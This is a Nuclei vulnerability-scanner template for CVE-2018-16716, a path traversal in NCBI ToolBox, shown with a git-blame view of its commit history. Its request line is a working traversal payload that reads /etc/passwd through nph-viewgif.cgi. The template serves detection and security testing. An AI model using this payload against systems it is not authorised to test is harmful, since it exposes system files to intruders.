nuclei-templates/cves/2018/CVE-2018-16716.yaml

id: CVE-2018-16716

info:
  name: NCBI ToolBox - Directory Traversal
  author: 0x_Akoko
  severity: high
  description: A path traversal vulnerability exists in viewcgi.c in the 2.0.7 through 2.2.26 legacy versions of the NCBI ToolBox, which may result in reading of arbitrary files (i.e., significant information disclosure)
    or file deletion via the nph-viewgif.cgi query string.
  reference:
    - https://github.com/grymer/CVE/blob/master/CVE-2018-16716.md
    - https://nvd.nist.gov/vuln/detail/CVE-2018-16716
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2018-16716
    cwe-id: CWE-22
  tags: cve,cve2018,ncbi,lfi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/blast/nph-viewgif.cgi?../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
Create CVE-2018-16716.yaml 2022-02-28 13:42:01 +00:00			`id: CVE-2018-16716`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00
Create CVE-2018-16716.yaml 2022-02-28 13:42:01 +00:00			`info:`
			`name: NCBI ToolBox - Directory Traversal`
			`author: 0x_Akoko`
			`severity: high`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`description: A path traversal vulnerability exists in viewcgi.c in the 2.0.7 through 2.2.26 legacy versions of the NCBI ToolBox, which may result in reading of arbitrary files (i.e., significant information disclosure)`
			`or file deletion via the nph-viewgif.cgi query string.`
Create CVE-2018-16716.yaml 2022-02-28 13:42:01 +00:00			`reference:`
			`- https://github.com/grymer/CVE/blob/master/CVE-2018-16716.md`
			`- https://nvd.nist.gov/vuln/detail/CVE-2018-16716`
			`classification:`
			`cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N`
			`cvss-score: 7.5`
			`cve-id: CVE-2018-16716`
			`cwe-id: CWE-22`
Update and rename CVE-2018-16716.yaml to cves/2018/CVE-2018-16716.yaml 2022-02-28 21:26:06 +00:00			`tags: cve,cve2018,ncbi,lfi`
Create CVE-2018-16716.yaml 2022-02-28 13:42:01 +00:00
			`requests:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/blast/nph-viewgif.cgi?../../../../etc/passwd"`

			`matchers-condition: and`
			`matchers:`
			`- type: regex`
			`regex:`
			`- "root:[x*]:0:0"`

			`- type: status`
			`status:`
			`- 200`